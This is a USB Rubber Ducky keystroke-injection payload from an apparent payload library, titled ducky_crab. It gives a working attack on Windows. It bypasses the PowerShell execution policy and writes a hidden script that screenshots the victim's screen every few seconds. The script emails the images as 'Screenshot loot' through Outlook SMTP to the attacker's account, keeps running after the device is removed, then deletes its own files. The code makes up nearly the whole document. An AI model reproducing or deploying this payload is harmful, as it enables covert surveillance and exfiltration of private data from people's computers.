Path: blob/master/payloads/library/exfiltration/Ducky_Crab/payload.txt
2968 views
REM Title: ducky_crab1REM Author: the-jcksn2REM Description: Gives "screen crab" like capabilities to the USB rubber ducky. Creates a powershell script that captures screenshots and exfiltrates them via outlook, once a minute, even after the USB rubber ducky has been removed.3REM Target: Windows4REM Version: 1.05REM Category: Exfiltration67REM ~~~~ You must change [email protected] and USERPASSWORD to your outlook credentials (line 45)8REM ~~~~ Change the time for the payload to run after ducky is removed (default 10 minutes - line 38)9REM ~~~~ DO NOT REMOVE THE RUBBER DUCKY UNTIL THE PROMPT APPEARS ON SCREEN SAYING TO DO SO, after this, the payload will run without the ducky inserted10REM ~~~~ You might have to adjust the delays, depending on the target machine, but these worked ok for me.11REM ~~~~ Use responsibly, and within the confines of the law.121314REM opening powershell and allowing scripts15DELAY 100016REM this needs to run first seperate from the script (allows scripts to run on target)17GUI r18DELAY 20019STRING powershell20ENTER21DELAY 20022STRING Set-ExecutionPolicy -ExecutionPolicy Bypass -Scope CurrentUser23ENTER24DELAY 20025REM the following line may cause an error on some systems, this can be ignored, on some systems it is REQUIRED, please do not alter this26STRING y27ENTER28DELAY 40029REM create the powershell script30STRING New-Item -Path 'Pictures' -Name 'screens.ps1' -ItemType file31ENTER32DELAY 20033STRING "cd C:\Users\$env:username\ `nNew-Item -Path 'C:\Users\$env:username\Pictures\Screens\' -ItemType Directory" | Out-File Pictures\screens.ps1 -Append34ENTER35DELAY 20036REM number of minutes to capture screenshots for - default is 10 (edit the integer to change)37STRING "`$timer = new-timespan -Minutes 10" | Out-File Pictures\screens.ps1 -Append38ENTER39DELAY 20040STRING "`$clock = [diagnostics.stopwatch]::StartNew() `nwhile (`$clock.elapsed -lt `$timer){ `n[void][reflection.assembly]::loadwithpartialname('system.windows.forms') `n`$Screen = [System.Windows.Forms.SystemInformation]::VirtualScreen `n`$Width = `$Screen.Width `n`$Height = `$Screen.Height `n`$Left = `$Screen.Left `n`$Top = `$Screen.top `n`$bitmap = New-Object System.Drawing.Bitmap `$Width, `$Height `n`$graphic = [System.Drawing.Graphics]::FromImage(`$bitmap) `n`$graphic.CopyFromScreen(`$Left, `$Top, 0, 0, `$bitmap.Size) `n`$enddate = (Get-Date).tostring('ddMMyy-hh_mm_ss') `n`$filename = `$enddate + '.gif' `n`$bitmap.Save('C:\Users\$env:Username\Pictures\Screens\' + `$filename) `nstart-sleep -seconds 10" | Out-File Pictures\screens.ps1 -Append41ENTER42DELAY 20043REM change [email protected] (3 times) and USERPASSWORD (once) to your credentials below. DO NOT REMOVE ANY QUOTES OR BACKTICKS44STRING "Send-MailMessage -From [email protected] -To [email protected] -Subject `"Screenshot loot`" -Body `"Please find attached your screenshot update`" -Attachment `"Pictures\Screens\`$filename`" -SmtpServer smtp-mail.outlook.com -Port 587 -UseSsl -Credential (New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList [email protected], (ConvertTo-SecureString -String `"USERPASSWORD`" -AsPlainText -Force))" | Out-File Pictures\screens.ps1 -Append45ENTER46DELAY 20047STRING "start-sleep -seconds 60 `n} `nSet-ExecutionPolicy -ExecutionPolicy Undefined -Scope CurrentUser `nGet-ChildItem Pictures\Screens -Include *.* -Recurse | ForEach {`$_.Delete()} `nRemove-Item Pictures\screens -Confirm:`$false `nRemove-Item Pictures\screens.ps1 -Force `nexit" | Out-File Pictures\screens.ps1 -Append48ENTER49DELAY 20050STRING exit51ENTER52DELAY 30053REM run the script we created54GUI r55DELAY 30056STRING powershell -w hidden -File "%USERPROFILE%\Pictures\screens.ps1"57ENTER58DELAY 100059GUI r60DELAY 20061STRING notepad62ENTER63DELAY 30064STRING You may now remove the rubber ducky and close this window. Loot will arrive shortly.65ENTER66ENTER67DELAY 50068STRING Closing this window automatically in:69ENTER70STRING 3...71ENTER72DELAY 60073STRING 2...74DELAY 60075ALT F476STRING n777879